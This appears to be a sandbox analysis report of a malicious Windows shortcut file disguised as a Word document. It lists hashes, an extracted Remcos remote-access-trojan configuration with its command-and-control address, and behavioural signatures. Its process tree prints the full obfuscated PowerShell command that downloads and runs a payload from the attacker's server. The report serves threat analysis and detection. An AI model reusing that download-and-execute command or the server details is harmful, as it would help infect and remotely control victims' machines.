Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
148s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30/08/2024, 11:11
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240704-en
General
-
Target
brt_1_0147.doc.lnk
-
Size
47KB
-
MD5
8b3dc64090b0b26eda4f1195f493160d
-
SHA1
bd0b4c1d9e8b84465714287727ba5293f9a8eb61
-
SHA256
cb43e05491b09d4c7da14d3f42d11a2bb4fa81b0fb47717d44c75426832cdf30
-
SHA512
ddbe1ad300d613531b6ffcb9a8ff607b1e6e7cf676ce738c31d138e6154ff0ee3c1b8d4d8b67c8fec5da444c845b62475736c228eb89d3b013a3ddcb15365deb
-
SSDEEP
48:88muavUQSbXTo87Cj3YMEDo/FoZaxCogDDo/LX7LdCZZGXu/dZZIa7x:88y8Nkgm3hX+UxCgLX7BuqQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4968 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 3460 Newfts.exe 1660 Newfts.exe -
Loads dropped DLL 8 IoCs
pid Process 3460 Newfts.exe 3460 Newfts.exe 3460 Newfts.exe 3460 Newfts.exe 1660 Newfts.exe 1660 Newfts.exe 1660 Newfts.exe 1660 Newfts.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1660 set thread context of 1324 1660 Newfts.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1540 WINWORD.EXE 1540 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4968 powershell.exe 4968 powershell.exe 3460 Newfts.exe 1660 Newfts.exe 1660 Newfts.exe 1324 cmd.exe 1324 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1660 Newfts.exe 1324 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4968 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1540 WINWORD.EXE 1540 WINWORD.EXE 1540 WINWORD.EXE 1540 WINWORD.EXE 1540 WINWORD.EXE 1540 WINWORD.EXE 1540 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4856 wrote to memory of 4968 4856 cmd.exe 85 PID 4856 wrote to memory of 4968 4856 cmd.exe 85 PID 4968 wrote to memory of 3460 4968 powershell.exe 93 PID 4968 wrote to memory of 3460 4968 powershell.exe 93 PID 4968 wrote to memory of 3460 4968 powershell.exe 93 PID 4968 wrote to memory of 1540 4968 powershell.exe 94 PID 4968 wrote to memory of 1540 4968 powershell.exe 94 PID 3460 wrote to memory of 1660 3460 Newfts.exe 95 PID 3460 wrote to memory of 1660 3460 Newfts.exe 95 PID 3460 wrote to memory of 1660 3460 Newfts.exe 95 PID 1660 wrote to memory of 1324 1660 Newfts.exe 97 PID 1660 wrote to memory of 1324 1660 Newfts.exe 97 PID 1660 wrote to memory of 1324 1660 Newfts.exe 97 PID 1660 wrote to memory of 1324 1660 Newfts.exe 97 PID 1324 wrote to memory of 2808 1324 cmd.exe 109 PID 1324 wrote to memory of 2808 1324 cmd.exe 109 PID 1324 wrote to memory of 2808 1324 cmd.exe 109 PID 1324 wrote to memory of 2808 1324 cmd.exe 109 PID 1324 wrote to memory of 2808 1324 cmd.exe 109
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo QMwlXCkteAQTQqnkaJqrUqs; echo QvYiYqvrrHquSStJfMRfSfWhN; echo bbOXmbTScxuUqnRAgrxICMaBVDaWjzRzRVcfkbymVEadrSAtp; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo smmOpvMyMQBsjhmNQati; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo XmLObXLAbAaEvFXwLygA; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo jKSqGTomhhZFxOMFkLZBsdHuhOCDBrMzMONLWouYJOCxTyelGMtYZGs; s''t''a''rt brt_1_0147.doc2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\brt_1_0147.doc" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1540
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5829061c019d6e9cf6a879cc7dcdeaef5
SHA1d9798c166877bec5a9700a69d7c5c4371bca440b
SHA256783191c67c6987cfa1b845508e1afc87fcb569d6489d6705ff5bb3c9430357fd
SHA512fca578a07c3854ba28405d246d849ae33cfb7975f7c77e70aefef99a2b122147af0fc02d1642f150c03aa758d425438ca1716585600a7b7eb6a75fc54806113d
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
427B
MD57b85b7d4cb78a67aaaf8a28a5908d085
SHA14ca5d3c35f4dae122e46db7bced21d4c99bf50ab
SHA256088c302e51aeb697a993a8fa4394d64e3c1b8ebd5fa542d2bdd336a361b12a3e
SHA5120676bcae4dcc475e4fca40b3a401368fdae3bf956c61c42d78ac8310f8dcae2cb7fc418c73c4a8ecc78ad5ac045b6388db5df8efcc8afb41ad0d162a25366c18
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize4KB
MD5d57353f53747072a7c751aff552d307d
SHA1a23aef557c2225a7b00399290dae382bd2550458
SHA256ec722e7c6c29a04ddfd88787f89cc58eaeffe02c1eabd948a6cbe9ac758e6344
SHA5129ecdb478eee8cf09d5ca0a8902b3e461e667436e1c895c33b1fa996c9c0218b28bc42b8519d01a3997aca90b8e2638734502e0d99fd38538808e91cf91824197
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize5KB
MD58bc5362bf2ecd24a870597020e641a7d
SHA17ff04749d52751b9d79390decab25e72ba4694ee
SHA25635b5c8f9f93860571ec88343674eab713fea15826774b112c12f1e731d04a732
SHA5123b9e75e4f6a3f7706f0fb2a36f54c851a23e2eaca4b4b6367e5ef6b6388868f5c047290d0ea35e5a00ce56bcb74a07c4e2a743cf6dbecd6080b011807e9134ce
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
47KB
MD52616f33bfc84fecd6496c0e3bfbfb1b0
SHA1e4f4fba392ba4a245415729a82aaa486ca31b2ba
SHA25624fbc1c09ca302ed51429082130f7789d36c254c0fb165dd96c3f24b458536a4
SHA512b5c585d7bbdce5e5c34447a311ccdb5b90e34cfd29671f2ebb05f01941e81ae7bcffbd42f5ed476e784684de70cb0fb67cedfd7e62c4c3b5cbe151fc6923dafb